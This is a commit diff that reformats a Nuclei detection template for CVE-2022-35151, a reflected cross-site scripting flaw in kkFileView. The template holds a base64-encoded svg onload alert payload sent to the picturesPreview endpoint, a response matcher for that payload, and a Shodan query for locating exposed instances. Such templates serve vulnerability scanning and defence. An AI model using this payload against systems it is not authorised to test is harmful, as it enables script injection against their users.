Update CVE-2022-35151.yaml
parent
27665b759a
commit
335b407ab3
|
@ -11,26 +11,26 @@ info:
|
||||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35151
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35151
|
||||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-35151
|
||||||
metadata:
|
metadata:
|
||||||
verified: "true"
|
verified: true
|
||||||
shodan-query: http.html:"kkFileView"
|
shodan-query: http.html:"kkFileView"
|
||||||
tags: cve,cve2022,xss,kkfileview
|
tags: cve,cve2022,xss,kkfileview
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B"
|
- '{{BaseURL}}/picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoMSk%2B'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
part: body
|
part: body
|
||||||
words:
|
words:
|
||||||
- '<svg/onload=alert(1)>'
|
- "<svg/onload=alert(1)>"
|
||||||
|
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
|
||||||
- 'text/html'
|
|
||||||
part: header
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/html"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
|
|
Loading…
Reference in New Issue